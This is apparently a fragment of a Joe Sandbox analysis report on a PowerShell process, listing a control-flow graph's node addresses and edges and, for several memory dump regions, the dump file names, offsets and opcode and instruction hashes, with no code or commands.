                                              control_flow_graph 125 7ffb4b38031d-7ffb4b380371 131 7ffb4b380374-7ffb4b380385 125->131 132 7ffb4b380373 125->132 133 7ffb4b380388-7ffb4b380427 131->133 134 7ffb4b380387 131->134 132->131 139 7ffb4b380429-7ffb4b380441 133->139 140 7ffb4b380443-7ffb4b380450 133->140 134->133 139->140 144 7ffb4b380510-7ffb4b380528 140->144 145 7ffb4b380456-7ffb4b380459 140->145 145->144 146 7ffb4b38045f-7ffb4b380477 145->146 149 7ffb4b380490-7ffb4b380494 146->149 150 7ffb4b380479-7ffb4b38048e 146->150 149->144 152 7ffb4b380496-7ffb4b380499 149->152 150->149 153 7ffb4b3804c0 152->153 154 7ffb4b38049b-7ffb4b3804be 152->154 155 7ffb4b3804c2-7ffb4b3804c4 153->155 154->155 155->144 156 7ffb4b3804c6-7ffb4b3804d9 155->156 160 7ffb4b3804e0-7ffb4b3804e9 156->160 161 7ffb4b380502-7ffb4b38050f 160->161 162 7ffb4b3804eb-7ffb4b3804f8 160->162 162->161 164 7ffb4b3804fa-7ffb4b380500 162->164 164->161
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1599684153.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffb4b380000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 10463f34cd75032efbcc910bfcb7b6fb80a06a598ab7be0ca224a16696d87d2c
                                              • Instruction ID: a5467984d8f265829dfc040c423f0d1167057a867c430d72ad92d901428ce2ed
                                              • Opcode Fuzzy Hash: 10463f34cd75032efbcc910bfcb7b6fb80a06a598ab7be0ca224a16696d87d2c
                                              • Instruction Fuzzy Hash: 42711671A4DBC94FEB92AF7988642B57BE0EF56210F0841FAD18CC71A3ED189C05C762

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1599684153.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffb4b380000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 394cef9ef492c1cabef57c95bacb5ae63e11ffac118565215205d13e5f3f1d65
                                              • Instruction ID: b622c20537aa1d39c71d61612453806be731977e504c1e147257b5ceb09ffd89
                                              • Opcode Fuzzy Hash: 394cef9ef492c1cabef57c95bacb5ae63e11ffac118565215205d13e5f3f1d65
                                              • Instruction Fuzzy Hash: BC512DE2E1EE460FFFAAAE7D8951275A6D1DF84290F5840BED54DC31E7DD08A8054383

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1599684153.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffb4b380000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e521b0f628cc0f68945e798fa2a283c573e43f261689078d82bedc833e5ad84
                                              • Instruction ID: 213c22ca62cea64ffa07b5d86fc350387f107b477e698c2822d5689d474c20cb
                                              • Opcode Fuzzy Hash: 6e521b0f628cc0f68945e798fa2a283c573e43f261689078d82bedc833e5ad84
                                              • Instruction Fuzzy Hash: 8A4108D2E1FE870BFBAABE7E896527995D1DF80290F5840BDD64DC31E6DD08A8054243
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1599175350.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffb4b2b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f35976d46e6540710bb60d4bad797e2c3a135dfd4e287c0ae07f49e8bff3619b
                                              • Instruction ID: b6a0b03ffcb70803c38e4373bb8f725b7f62eb60f8a84077593b4a9fadf743b2
                                              • Opcode Fuzzy Hash: f35976d46e6540710bb60d4bad797e2c3a135dfd4e287c0ae07f49e8bff3619b
                                              • Instruction Fuzzy Hash: 02221B70D086198FDB18DFA8C4959EDBBB2FF88300F14866DD51AAB386CB346885CF54
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1599175350.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffb4b2b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad671091a183ce20ebc0ec81d0fb71ec2227f03424cd67020bb4e32d9cc5d119
                                              • Instruction ID: f16e647d4e8d08ebb9420f7ceaa9999f4a0982ad71e9ae06e54bdeb41a42fcd5
                                              • Opcode Fuzzy Hash: ad671091a183ce20ebc0ec81d0fb71ec2227f03424cd67020bb4e32d9cc5d119
                                              • Instruction Fuzzy Hash: 495100A284E7C14FD7039BB08C665947FB0AF17224B4E45EFC4D0CB0A3EA595A5AC322